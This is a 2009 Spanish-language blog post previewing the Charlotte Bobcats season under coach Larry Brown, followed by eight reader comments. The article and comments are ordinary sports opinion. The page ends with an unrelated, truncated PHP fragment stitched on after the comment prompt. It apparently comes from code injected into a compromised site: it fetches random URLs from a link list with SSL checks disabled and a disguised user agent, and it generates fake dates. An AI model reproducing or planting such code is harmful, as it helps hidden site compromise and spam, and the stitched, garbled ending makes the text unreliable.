Charlotte Bobcats: Larry Brown no da con la “Answer”

02 de October de 2009 por TheDeerHunter

Nos quedamos alucinados cuando el año pasado “su majestad” decidió poner la franquicia más joven de la liga en manos del viejo zorro Larry Brown, que ya tiene sus añitos, y éste se puso a remover todas las piezas como si no hubiera habido un ayer, sustituyendo los jóvenes valores por veteranos perros de presa y dando carpetazo de una tacada a todo el trabajo que se había realizado hasta la fecha. Empezar de cero al “modo Brown” tiene sentido para un proyecto nuevo a 5-10 años vista. No sabremos si el coach tiene pensado durar tanto tiempo en el cargo.

Lejos de comprender estos, a nuestros ojos, desconcertantes movimientos, apreciamos con cierto estupor la mejoría, al batir el récord de victorias y cuajando la mejor defensa de la corta vida de la franquicia. Llegaron a marcarse un febrero con un 65% de victorias que, de haber logrado mantener, hubiera supuesto holgadamente la primera clasificación de la historia a la post-temporada. Es de justicia reconocer que el tipo sabe muy bien lo que se hace en este tipo de guerras pero el caso es que lo que quedó el año pasado fue una plantilla con menor potencial y recorrido, sin disponer tampoco de excesivas garantías de presente. Y a partir de ahí los movimientos han sido:

– Traspasar a Okafor a cambio de Tyson Chandler, un contratazo de 12 millones de dólares por cada uno de los 2 años que le restan y que literalmente quemaba en las oficinas de los Hornets. Tampoco podemos decir que vaya a ser el jugador franquicia que necesitan, además de haber padecido importantes y polémicos problemas físicos.

-Pajarear con la renovación de Raymond Felton.

-Fracasar en el intento de fichaje de la “emergente joven estrella” Allen Iverson.

Evidentemente el sentimiento de perplejidad ha crecido más si cabe durante el verano, a expensas de curiosas sorpresas que nos aguarden a la vuelta de la esquina con la dupla Jordan-Brown manejando los hilos. Si me dijeras que todo esto tiene como objetivo liberar salario o algo, reconstruir… pero no parece el caso.

Tras haber firmado a regañadientes a Felton para únicamente el próximo año, quedaría Gerald Wallace como primera espada del equipo. Se trata de un jugador sólido y cumplidor, muy del agrado de los sistemas defensivos Brown, pero no es un sólido anotador. Aún con todo no se ha librado tampoco de rumores de salida añadiendo todavía mayor sensación de inestabilidad.

Quien tiene las horas contadas es Raymond Felton quien saldrá el verano que viene al mercado de agentes libres. Es el patito feo de su extraordinaria generación de bases pero el año pasado fue fundamental en los “buenos” momentos. No terminará de convencer a Brown, pero deberían estar dando palmas por haberle retenido ahora. Tuvo mérito lo de Augustine, habiéndose ganado el pasado curso el respeto de un jefe al que le hacen escasa gracia los rookies en general y los “jugones” de su perfil en particular. Lo hizo bien, pero es bastante irregular y difícilmente el director de juego que les hubiera podido sacar de pobres sin la presencia de Felton. Pero para terminar de ilustrar lo mucho que confía en ellos dos, pocos días después de renovar a Felton han fichado a “Flip” Murray. Seguro que les resulta útil, atendiendo a la buena campaña que realizó con los Hawks, pero tampoco parece que les pueda dar el salto cualitativo que necesitan.

Tras ellos están los Diaw, Raja Bell, Chandler, Diop, Mohammed… y cómo no, in Radmanovic we trust. Ya podemos adivinar con cierta exactitud qué es lo que van a aportar todos ellos. Ninguno es un joven prospecto que nos pueda deslumbrar de forma inesperada. Veteranos gladiadores dispuestos a meterse sin rechistar en el fango defensivo que les exige Brown. Pero todos de perfil plano, casi como aquellos Sixers que tanta guerra (y tanto daño a la vista) causaron en el Este hace ya una década. No cabe duda de que tienen una buena base defensiva, pero a estos Bobcats les faltaría un Iverson. Suponemos que por eso intentaron ficharlo, imaginando quizás que él podría causar los mismos estragos que aquel chaval de 25 años. Por último, Dontell Jefferson, Ajinca y dos rookies que no tenemos muy claro  que vayan a destacar demasiado de forma inmediata: Gerald Henderson (pick 12 de 1ª ronda) y Derrick Brown (pick 10 de la 2ª)

Un equipo sin estrellas… o al menos ninguna tan brillante como la del técnico. No sabemos si esto será suficiente para competir de verdad.

Quinteto inicial: Felton, Bell, Wallace, Diaw, Chandler

6º Hombre: Radmanovic

Pronóstico: Sin cambios significativos no superarán el récord de 35 victorias de la franquicia. Y con cambios… pues mejor que no pensemos en los cambios. Que sean ellos los que nos sorprendan (A ver si Jordan se anima y vuelve para dotar de sangre nueva a la plantilla).

Comenta

8 comentarios a esta entrada

  1. pcerezo dice:
    #1

    No veas si da pereza comentar algo de los Bobcats.

    La carrera de Jordan como ejecutivo es inversamente proporcional a su carrera como jugador. Son tremendas las decisiones que ha tomado tanto en Wizards como en Bobcats…

    En cuanto a Larry Brown a lo suyo. Defense, defense y a poner el cazo mix.

    Un saludo,
    Pablo

      Citar

  2. Txusma dice:
    #2

    Pereza, esa es la palabra y es que ni siquiera las elecciones que hacen en el draft emocionan a nadie…

      Citar

  3. Jabho dice:
    #3

    Pero sosos, sosos, sosos….

      Citar

  4. Óscar dice:
    #4

    Me mojo: creo que Charlotte va a ser equipo de playoff y de las revelaciones. Brown ha cambiado prácticamente en 13 meses el equipo de arriba a abajo, haciéndolo a su gusto y con el respaldo de Jordan, que confía ciegamente en él.
    Fue el equipo que más jugadores empleó la 08/09 (creo que 24 jugadores distintos llegaron a formar parte del roster). Larry tiene lo que quiere, un equipo fuerte defensivamente, disciplinado y cohesionado. Creo que va a ser un hueso duro para todos los rivales.
    El principal error para mí la temporada pasada fue “regalar” a los Lakers a Shannon Brown, un jugador muy del corte de Larry Brown, y que sorprendentemente utilizaba no más de 15 minutos por partido. La principal incógnita, el resultado del intercambio Okafor/Chandler. Apuesta arriesgada teniendo en cuenta el historial y las revisiones médicas de Tyson. Veremos.
    DJ Augustin seguirá creciendo y ojo al rookie de Duke Gerald Henderson, que junto a Flip Murray dotarán a los Bobcats de la capacidad anotadora desde el perímetro que necesitaban. Felton volverá a ofrecer lo mejor y lo peor en cada partido, como “Crash” Wallace. Diaw y Bell, rendimiento puro asegurado. Y el amigo Radmanovic buscará ser el mejor 6º hombre del año hasta que le apetezca o vea que no puede… A ver si “Coach Larry” le mete en cintura.
    Lo dicho, será por lo que aprecio a Larry Brown, pero me parece un equipo que va a sorprender este año.

      Citar

  5. Dantley2 dice:
    #5

    Coincido, sosetes. No los veo en playoffs la verdad.

      Citar

  6. Viva_Dirk dice:
    #6

    Estoy cercano a la postura de Oscar, creo que tienen un equipo jodido de ganar para rivales sin un gran caudal ofensivo y que ellos pueden hacer su juego frente a cualquiera. El quinteto que da el análisis con Chandler a buen nivel es defensivamente muy bueno y en ataque sin grandes anotadores si tienen gente solvente como Felton, Wallace o Diaw.

    No creo que Radmanovic vaya a ser el 6º hombre, veo en ese papel a Augustine, que con Murray pueden aportar mucha capacidad anotadora desde el banco.

    Es verdad que si Arenas está recuperado y Toronto vuelve a ser un equipo serio, el Este se pone un poco mas caro pese a la supuesta bajada de los Sixers. Los veo haciendo un buen año y seguramente moviendose antes de febrero con Felton como moneda de cambio y metiendo en el año el contrato de Diop o de Mohammed.

      Citar

  7. kantonyo dice:
    #7

    Yo tambien estoy de acuerdo con la mayoria, no me atrae nada de este equipo.

    Me parece forzado el traspaso de Okafor por Chandler, por parte del jugador, porque sino no le veo sentido. Y la incorporación desde el draft de Gerald Henderson, creo que ha tirado más haber sido uno de los jugadores más carismáticos del estado de North Carolina, por haber sido la referencia de Duke los últimos años.

      Citar

  8. Landrusski dice:
    #8

    SOSETESSSSSSSSSSSSS jejejeje

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>